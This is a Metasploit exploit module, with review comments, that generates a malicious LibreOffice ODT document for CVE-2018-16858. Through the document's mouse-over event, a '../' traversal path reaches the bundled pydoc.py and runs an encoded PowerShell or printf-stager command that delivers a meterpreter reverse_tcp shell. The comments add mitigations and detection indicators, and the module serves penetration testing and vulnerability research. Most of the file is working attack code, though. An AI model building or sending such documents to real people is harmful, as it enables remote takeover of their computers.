GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format module for CVE-2018-16858: builds an ODT document whose
# mouse-over event is bound to a Python script reference that traverses out of
# LibreOffice's sample-macros folder (see 'Description' below).
#
# NOTE(review), defensive context:
# - The generated document depends on a vulnerable LibreOffice build; running a
#   build patched for CVE-2018-16858 is the primary mitigation.
# - The script reference used in #exploit is relative and contains `../`
#   segments; a document event whose script location leaves the macros folder
#   is an indicator worth scanning for in received ODT/FODT files.
# - Both targets end in an OS command (PowerShell on Windows, a printf command
#   stager on Linux), so an office process spawning a shell or PowerShell is
#   presumably what endpoint monitoring would observe.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  # Registers the module metadata (targets, references, defaults) and the
  # FILENAME option that names the generated document.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    # Target index 0: PowerShell-based command, see #gen_windows_cmd.
    windows_target = [
      'Windows',
      {
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Payload' => 'windows/meterpreter/reverse_tcp',
        'DefaultOptions' => { 'PrependMigrate' => true }
      }
    ]

    # Target index 1: printf command stager, see #gen_linux_cmd.
    linux_target = [
      'Linux',
      {
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Payload' => 'linux/x86/meterpreter/reverse_tcp',
        'DefaultOptions' => { 'PrependFork' => true },
        'CmdStagerFlavor' => 'printf'
      }
    ]

    module_info = update_info(
      info,
      'Name' => 'LibreOffice Macro Code Execution',
      'Description' => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.

        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Alex Inführ', # Vulnerability discovery and PoC
        'Shelby Pace' # Metasploit Module
      ],
      'References' => [
        ['CVE', '2018-16858'],
        ['URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html']
      ],
      'Platform' => ['win', 'linux'],
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [windows_target, linux_target],
      'DisclosureDate' => '2018-10-18',
      'DefaultTarget' => 0,
      # NOTE(review): reliability, stability and side effects are all declared
      # as unknown, so operators get no guidance on crash risk or artifacts.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(module_info)

    register_options(
      [OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])]
    )
  end

  # Builds the Windows command from the encoded payload via cmd_psh_payload and
  # stores it in @cmd.
  #
  # @return [String] the command with the trailing ' &amp;&amp; echo' suffix
  def gen_windows_cmd
    psh_opts = {
      remove_comspec: true,
      method: 'reflection',
      encode_final_payload: true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, psh_opts)
    # The suffix is an XML-escaped `&&`; presumably @cmd is embedded in the
    # document XML by the template, which is not shown here - confirm.
    @cmd << ' &amp;&amp; echo'
  end

  # Builds the Linux command from the first command-stager line and stores it
  # in @cmd.
  #
  # @return [String] the command with the trailing ' &amp;&amp; echo' suffix
  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    # Same XML-escaped `&&` suffix as the Windows variant.
    @cmd << ' &amp;&amp; echo'
  end

  # Renders the document from the ERB template shipped in the framework's data
  # directory.
  #
  # The template is evaluated with this method's binding, so `path`,
  # `text_content` and instance state such as @cmd are visible to it; keep
  # those names stable (presumably the template reads them - it is not shown
  # here).
  #
  # @param path [String] script location exposed to the template
  # @return [String] rendered document contents
  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    template_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb')
    fodt_file = File.read(template_file)
    ERB.new(fodt_file).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  # Entry point: builds the command for the selected target, renders the
  # document and writes it out with file_create.
  def exploit
    # Relative script location; it names the python-core-3.5.5 directory
    # explicitly, so it only resolves on installs that contain that directory.
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'

    # Targets are matched by numeric index (0 = Windows, 1 = Linux).
    case datastore['TARGET']
    when 0 then gen_windows_cmd
    when 1 then gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end

    file_create(gen_file(path))
  end
end